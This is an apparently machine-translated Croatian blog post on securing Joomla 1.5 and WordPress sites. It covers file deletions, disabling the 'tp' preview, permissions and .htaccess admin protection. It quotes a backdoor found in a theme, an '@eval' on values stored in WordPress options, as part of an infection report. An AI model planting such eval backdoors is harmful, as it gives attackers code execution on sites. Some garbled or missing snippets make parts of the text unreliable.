Brzina skeniranja ovisi o brzini vašeg računala i broju datoteka u motoru vaše web stranice. Trebalo mi je nekoliko sati za https://site, jer Aibolit sumnja da čak i slike skrivaju viruse, a ja imam tonu upravo tih slika, a cache datotekama treba dosta vremena prilikom skeniranja. Za stranice na Joomli 1.5, provjera je bila mnogo brža.

Odlučio sam provesti dan tražeći načine za poboljšanje sigurnosti web stranice. Malo smo uspjeli napraviti, ali ipak bolje nego ništa. Počnimo s jačanje zaštite (i smanjenje ranjivosti) dviju stranica na Joomli 1.5. Urađeno je sljedeće:


Kako drugačije zaštititi Joomlu 1.5 od virusa i strujanja hakova

  1. Također, “stručnjaci” tvrde da su stranice na Joomli 1.5 provaljene “jedan ili dva puta” korištenjem one dostupne u engineu (preko nje navodno možete promijeniti admin lozinku). Čak i ako ne koristite registraciju na svojoj web stranici i nigdje ne prikazujete vezu za oporavak, to ne znači da ste pokrili ovu ranjivost. Samo dodajte sljedeći isječak URL-u početne stranice svoje web-lokacije i dobit ćete značajku koju tražite: /index.php?option=com_user&view=reset

    Zapravo, da biste zatvorili ovu rupu u zakonu (ali još uvijek ne razumijem kako to koristiti za hakiranje), možete jednostavno izbrisati sljedeću datoteku:

    /components/com_user/models/reset.php Istina, nakon ovoga nitko od korisnika registriranih na vašoj stranici neće moći koristiti funkciju oporavka zaporke, ali za mene to nije bilo važno jer registracija nije bila omogućena.

  2. Također kažu da tako koristan trik, poput dodavanja adrese stranice, također omogućuje piscima virusa i lovcima na tuđu imovinu da dođu do nekih osjetljivih područja vaše stranice i učine je destruktivnom ili na neki drugi način zlouporabom. Ova se stvar ponovno uklanja uređivanjem jedne od datoteka motora. /libraries/Joomla/application/module/helper.php

    Tamo morate ukloniti dva dijela koda ili ih komentirati, prilažući ih u /* i */ (ovaj kod neće izvršiti tumač jezika). Prvi fragment je ovakav:

    If(count($result) == 0) ( if(JRequest::getBool("tp")) ( $result = JModuleHelper::getModule("mod_".$position); $result->title = $position; $result->content = $position; $result->position = $position; ) )

    A druga je ovakva:

    If(JRequest::getBool("tp")) ( $attribs["style"] .= " outline"; )

    Zapravo, nakon ovoga resetirate predmemoriju i pokušavate vidjeti položaje modula u svom predlošku pomoću ove konstrukcije:

    https://site/?tp=1

    Ako nije uspjelo, nadamo se da ste zatvorili ovu rupu.

  3. Vrlo često stranice nisu hakirane izvana, već iznutra. Trojanci i keygenovi na vašem računalu znaju što i gdje tražiti, dakle ne pohranjujte lozinke u FTP klijente(postoji opcija za korištenje u tu svrhu).Još je cool onemogućiti mogućnost pristupa vašoj stranici putem FTP-a, a umjesto toga, gdje su prenesene informacije (uključujući lozinke) šifrirane, čineći ih beskorisnim presretanje. Iskreno govoreći, posljednji savjet zanemarujem zbog svog “mraka”. Također postoji mogućnost postavljanja pristupa vašoj stranici putem običnog FTP-a samo s određene IP adrese (vašeg računala), ali moj Internet provider ima dinamički IP (mijenja se unutar određenog raspona).
  4. Također savjetovati motor ne viši od stvarno potrebnih za njegov rad. Zapravo, bez razmišljanja, postavio sam ga prema predlošku: 755 za mape i 644 za datoteke. Sve možete učiniti koristeći istu Filezillu. Štoviše, ova se prava moraju primijeniti ne samo na direktorije korijenske mape, već i na sve direktorije i datoteke koje se nalaze unutar njih.

    Za datoteke u root folderu sam postavio dopuštenja na 444, a za direktorije tmp i logs na 705. Naravno, mogao sam i čvršće stisnuti, ali nemam puno iskustva u tome, a nije bilo ni vremena gubiti vrijeme na pokuse. A osim toga, sve to neće ozbiljno odvratiti hakere, jer postoje stvari koje mogu poništiti sav naš trud. Da biste to učinili, koristite naredbe poput ove:

    Stoga, kako bi se datoteke Joomla 1.5 motora u potpunosti "zabetonirale" od hakiranja i zadiranja, potrebno je zabraniti promjenu prava pristupa datotekama i mapama putem PHP-a. To se radi u postavkama poslužitelja, ali još ne znam kako i gdje. Ako znate, postavite link.

  5. Sve gore navedeno osmišljeno je kako bi se smanjila vjerojatnost da će vaša stranica biti hakirana i da će u nju prodrijeti školjke i drugi zlonamjerni softver. Međutim, poduzete mjere opreza nisu jamstvo, tako da bi bilo sjajno na poslužitelju (gdje se nalazi vaša Joomla 1.5 stranica). Ovo će ukloniti sve negativnosti iz procurjelog zla. Međutim, osobno, opet, to još nisam implementirao iz razloga svog “mraka”. Bio bih zahvalan za poveznice na materijale koji objašnjavaju ovaj proces.

    6. Vrlo često se web stranice pokvare nakon pristupa administrativnoj ploči. Jasno je da je zaštićena lozinkom, pa se brutalnom silom (pametnim odabirom) mnoge, čak i naizgled složene lozinke razbijaju u jednoj ili dvije. Zato treba zaštititi i admin panel, a bolje je to učiniti ne koristeći dodatna proširenja, već koristeći poslužiteljske alate. Postoji nekoliko mogućnosti zaštite. Na primjer, možete promijeniti URL administratorske ploče na ovaj ili onaj način tako da haker ne može započeti svoj prljavi posao.

    Drugi način zaštite, koji će biti detaljno opisan u nastavku, je stvaranje dodatne barijere na putu napadača (živa osoba ili skripta). Sastoji se od zaštite lozinkom direktorija s administratorskim datotekama (u Joomli je to administratorska mapa, au WordPressu - wp-admin) pomoću web poslužitelja. Ispada da kada pristupate administratorskoj ploči, prvo ćete morati unijeti prijavu i lozinku za pristup mapi, a tek onda prijavu i lozinku za pristup, zapravo, administratorskoj ploči motora. Štoviše, probijanjem prve linije obrane korištenjem brute force metoda, zlonamjerni softver neće stvoriti značajno dodatno opterećenje na poslužitelju, što je dobro.

  6. Još jedna vrlo važna, po mom mišljenju, napomena za povećanje sigurnosti vaših stranica od hakiranja i zaraze virusima je pridržavanje pravila: jedna stranica - jedan hosting račun. Da, skuplje je, ali mnogo sigurnije. Kada se nalaze na jednom računu, sve vaše stranice bit će odmah dostupne putem FTP-a ako zlonamjerni softver dobije pristup samo jednoj od njih. Automatski razbijaju stranice i ne bi bilo razumno nadati se da se skripte neće popeti na stablo imenika. Osim toga, vrlo je teško tretirati hrpu stranica na jednom hosting računu, jer radom na jednoj stranici gubite iz vida onu već izliječenu, koja se u isto vrijeme inficira.
  7. Usput, mogu se pokvariti ne samo s vaše vlastite web stranice, već i s web stranice vašeg susjeda hostinga, ako se vlasnici nisu dovoljno pobrinuli da isključe tu mogućnost. Hosting panel (kao npr.) također može biti hakiran, ali u svakom slučaju, broj hakiranja krivnjom hostera je zanemariv u odnosu na broj hakiranja nepažnjom vlasnika stranice.

Kako zaštititi administrativno područje vaše web stranice od hakiranja?

Želim detaljno govoriti o metodi zaštite koju sam nedavno koristio. Sastoji se u zabrana pristupa mapama u kojima se nalaze datoteke administrativne ploče stranice. Zabrana se postavlja pomoću prekrasne .htaccess datoteke, koja vam, u biti, omogućuje daljinsko upravljanje postavkama web poslužitelja na kojem je instalirana vaša stranica. Istodobno, on zna kako to učiniti selektivno.

Sve direktive napisane u .htaccessu primjenjivat će se samo na direktorij u kojem se nalazi. Želite li nešto promijeniti u postavkama cijele stranice? Zatim smjestite .htaccess u korijensku mapu. Pa, zanimaju nas samo postavke vezane uz mapu s admin datotekama, pa ćemo je tamo smjestiti. U Joomli to će biti administratorska mapa, u WordPressu - wp-admin.

Međutim, ne možemo proći samo s .htaccessom. Također ćete morati koristiti .htpasswd, gdje će biti pohranjeni prijava i lozinka za pristup ovoj administrativnoj mapi. Štoviše, lozinka neće biti pohranjena u čistom tekstu, već kao MD5 šifra. Pomoću nje neće biti moguće oporaviti lozinku, ali kada unesete ispravnu kombinaciju u polje za lozinku, web poslužitelj će izračunati iznos MD5 za ovu kombinaciju i usporediti ga s onim što je pohranjeno u .htpasswd. Ako se podaci podudaraju, bit će vam dopušten ulazak u administratorsko područje Joomle ili WordPressa, ali ako ne, neće vam biti dopušteno.

To je sve, preostaje samo provesti plan u život. Morate dodati neke direktive u .htaccess. Znate li koje? ne znam I nekako ćete morati pretvoriti lozinku u MD5 sekvencu. Problem. Međutim, ima prilično jednostavno rješenje. Dobri ljudi organizirali su online servis za generiranje sadržaja za .htaccess datoteku i .htpasswd datoteku na temelju korisničkog imena i lozinke koju ste kreirali. Istina, morat ćete navesti i apsolutni put do administrativne mape, ali to je trivijalno.

Dakle, upoznajte veliko i strašno generator zaštite za admin panel vaše stranice. Vidim, zar ne? Smislite, ili najbolje, napravite dvije složene kombinacije slova, brojeva i simbola na nečemu, nakon čega ih upisujete u dva gornja polja. Samo ih nemojte zaboraviti zapisati ili staviti u upravitelj lozinki, inače se nećete moći prijaviti u administratorsko područje i morat ćete iznova početi raditi sve što je opisano u ovom dijelu.

Ovdje sada. Znate li ovu? Čak i ako ne znate, nije važno. Povežite se na stranicu putem FTP-a, kreirajte datoteku u njenom korijenu s bilo kojim imenom (čak i sa sljedećim url_path.php) i dodajte joj ovaj jednostavni kod:

"; echo "Puna staza do skripte i njen naziv: ".$_SERVER["SCRIPT_FILENAME"]."
"; echo "Naziv skripte: ".$_SERVER["SCRIPT_NAME"]; ?>

Zatim idite u preglednik i unesite ovaj URL u adresnu traku (sa svojom domenom, naravno):

https://site/url_path.php

Kao rezultat toga, vidjet ćete apsolutni put koji vas zanima. Unesite ga u gornji generator datoteka .htaccess i .htpasswd. Ne zaboravite dodati naziv administratorske ili mape wp-admin na kraju ove staze bez kose crte na kraju. To je to, sada kliknite na gumb "Generiraj".

I jednu po jednu, prenesite sadržaj za datoteke .htaccess i .htpasswd izravno u te iste datoteke.

Nadam se da ste ih već kreirali u administratorskim ili wp-admin mapama (ovisno o motoru koji koristite)?

Pa, sada se pokušajte prijaviti na admin panel. Pojavljuje se prozor koji od vas traži da unesete korisničko ime i lozinku za vaš web poslužitelj? Različito se prikazuje u različitim preglednicima, ali u Chromeu izgleda ovako:

Ako nešto ne radi, onda "popušite" apsolutni put do .htpasswd, napisan u datoteci .htaccess. U tom slučaju samo ručno ispravite to prilikom uređivanja datoteke. To je sve što sam ti danas htio reći. Ako želite nešto kritizirati ili dodati, samo izvolite.

Virus u WordPressu?

Nakon što sam napisao ovaj članak, otkrio sam malware na svom blogu (https://site) (ili nešto što je instalirano mimo moje volje). Samo sam htio promijeniti nešto u kodu i ušao sam u . Na samom dnu, neposredno prije oznake Body, zapanjio me poziv neke meni nepoznate funkcije (na osnovu naziva, ali nisam našao ništa korisno):

Čini se da je ime razumno. Važno je spomenuti da sam otprilike tri tjedna prije slučajno otkrio da imam novu tablicu u bazama podataka dva svoja WordPress bloga (https://site i još jedan). Ime mu je bilo jednostavno divno - wp-config. Ponovno guglanje ovog naziva nije dalo ništa korisno jer su svi odgovori bili vezani uz istoimenu datoteku wp-config.php.

Ta je tablica brzo porasla (do stotinu megabajta na https://site) iu nju su upisane adrese stranica moje stranice s raznim parametrima. Ne shvaćajući suštinu ovog procesa, jednostavno sam srušio ovaj stol i to je to. Usput, imam još jedan blog na WordPressu, ali ništa slično nije primijećeno tamo.

Pa, evo našao sam takav "govorni" umetak u temu. Odlučio sam vidjeti je li ondje dodano nešto što je u skladu s gore opisanim redkom na dnu podnožja. Ispostavilo se da je dodano. I tako uredno - ni na samom vrhu, ni na samom dnu, već druga (ili treća) funkcija upisana odozgo:

Funkcija wp_custom_page_links_return() ( $option = get_option("wp_custom_page_links"); @eval($option); ) @eval(get_option("wp_brlinks"));

Ovdje upada u oči prekrasan “eval”. Ono što je vrijedno pažnje je da je Aibolit (gore opisan) ovaj fragment smatrao sumnjivim, ali ja još nisam došao do toga, jer ovaj scenarij već mnoge ljude sumnjiči za nepouzdanost. Također sam guglao o ovom kodu i pronašao post (nažalost, ta je domena sada blokirana zbog neplaćanja) koji opisuje sličan problem. Moj prijatelj je pustio ovo sranje s novom temom u koju je ugrađen neki instalacijski kod.

Već godinama imam teme na oba zaražena bloga. Vjerojatno je postojala neka ranjivost u motoru ili , što su brzo (na streamu) iskoristili nedobronamjernici. Općenito, provjerite nema li takvih uključivanja. Datum izmjene opisanih datoteka bio je, po mom mišljenju, sredina rujna ove godine.

Također vam savjetujem da pogledate izbor iz 17 video lekcija o osiguravanju web stranica na Joomli. One će se automatski reproducirati jedna za drugom, a ako želite, možete se prebaciti na sljedeću lekciju pomoću odgovarajućeg gumba na ploči playera ili odabrati željenu lekciju iz padajućeg izbornika u gornjem lijevom kutu prozora playera:

Uživajte u gledanju!

Sretno ti! Vidimo se uskoro na stranicama bloga

Moglo bi vas zanimati

Stranica Joomla počela je proizvoditi hrpu pogrešaka poput - Strogi standardi: nestatička metoda JLoader::import () ne bi se trebala pozivati ​​statički u
Ažuriranje Joomle na najnoviju verziju
Izrada karte za Joomla stranicu pomoću komponente Xmap
Što je Joomla
Grupe korisnika u Joomli, postavke predmemoriranja i problem slanja pošte sa stranice
K2 komponenta za stvaranje blogova, kataloga i portala na Joomli - značajke, instalacija i rusifikacija
Moduli u Joomli - položaj gledanja, postavke i izlaz, kao i dodjeljivanje sufiksa klasa
Kako ažurirati statičnu Html stranicu u dinamičku na Joomli
Instalacija WordPressa u detaljima i slikama, prijava u WP admin područje i promjena lozinke
Joomla dodaci - TinyMCE, Load Module, Legacy i drugi instalirani prema zadanim postavkama



POVEZANI ČLANCI